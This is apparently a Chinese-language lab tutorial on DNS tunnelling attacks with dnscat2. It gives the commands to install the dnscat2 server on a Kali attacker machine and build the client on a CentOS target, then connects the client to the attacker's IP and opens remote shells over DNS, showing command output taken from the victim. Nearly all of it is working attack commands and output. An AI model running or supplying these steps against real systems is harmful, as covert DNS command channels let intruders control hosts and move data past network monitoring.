dns隧道攻击

一、dnscat2

攻击机(kali)：192.168.137.134

靶机(centos)：192.168.137.130

1、攻击机下载安装dnscat2

$ sudo git clone https://github.com/iagox86/dnscat2.git
$ cd dnscat2/server/
$ sudo gem install bundler
$ bundle install

2、攻击机上运行命令：ruby ./dnscat2.rb --secret=123456

┌──(kali㉿kali)-[/home/dnscat2/server]
└─$ ruby ./dnscat2.rb --secret=123456

New window created: 0
New window created: crypto-debug
Welcome to dnscat2! Some documentation may be out of date.

auto_attach => false
history_size (for new windows) => 1000
Security policy changed: All connections must be encrypted and authenticated
New window created: dns1
Starting Dnscat2 DNS server on 0.0.0.0:53
[domains = n/a]...

It looks like you didn't give me any domains to recognize!
That's cool, though, you can still use direct queries,
although those are less stealthy.

To talk directly to the server without a domain name, run:

  ./dnscat --dns server=x.x.x.x,port=53 --secret=123456

Of course, you have to figure out  yourself! Clients
will connect directly on UDP port 53.

dnscat2>

3、靶机下载安装dnscat2

]# git clone https://github.com/iagox86/dnscat2.git
]# cd dnscat2/client/
]# make

4、靶机运行命令：./dnscat --dns server=192.168.137.134,port=53 --secret=123456

./dnscat --dns server=【攻击机IP】,port=【攻击机端口默认是53】 --secret=【密码】

[root@localhost client]# ./dnscat --dns server=192.168.137.134,port=53 --secret=123456
Creating DNS driver:
 domain = (null)
 host   = 0.0.0.0
 port   = 53
 type   = TXT,CNAME,MX
 server = 192.168.137.134

** Peer verified with pre-shared secret!

Session established!

5、攻击机进行DNS隧道攻击

dnscat2> help

Here is a list of commands (use -h on any of them for additional help):
* echo
* help
* kill
* quit
* set
* start
* stop
* tunnels
* unset
* window
* windows
dnscat2> windows
0 :: main [active]
  crypto-debug :: Debug window for crypto stuff [*]
  dns1 :: DNS Driver running on 0.0.0.0:53 domains =  [*]
  1 :: command (localhost.localdomain) [encrypted and verified]
  2 :: sh (localhost.localdomain) [encrypted and verified] [*]
  3 :: sh (localhost.localdomain) [encrypted and verified] [*]
  4 :: sh (localhost.localdomain) [encrypted and verified] [*]
  5 :: sh (localhost.localdomain) [encrypted and verified] [*]
dnscat2> window -i 2
New window created: 2
history_size (session) => 1000
Session 2 Security: ENCRYPTED AND VERIFIED!
(the security depends on the strength of your pre-shared secret!)
This is a console session!

That means that anything you type will be sent as-is to the
client, and anything they type will be displayed as-is on the
screen! If the client is executing a command and you don't
see a prompt, try typing 'pwd' or something!

To go back, type ctrl-z.

New window created: 3
New window created: 4
New window created: 5
sh (localhost.localdomain) 2> ifconfig
sh (localhost.localdomain) 2> ens33: flags=4163  mtu 1500
        inet 192.168.137.130  netmask 255.255.255.0  broadcast 192.168.137.255
        inet6 fe80::a751:4e08:5cfc:30d5  prefixlen 64  sciopeid 0x20
        ether 00:0c:29:a9:45:54  txqueuelen 1000  (Ethernet)
        RX packets 52871  bytes 44202390 (42.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 23252  bytes 4082125 (3.8 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 276  bytes 24689 (24.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 276  bytes 24689 (24.1 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

virbr0: flags=4099  mtu 1500
        inet 192.168.122.1  netmask 255.255.255.0  broadcast 192.168.122.255
        ether 52:54:00:27:81:06  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0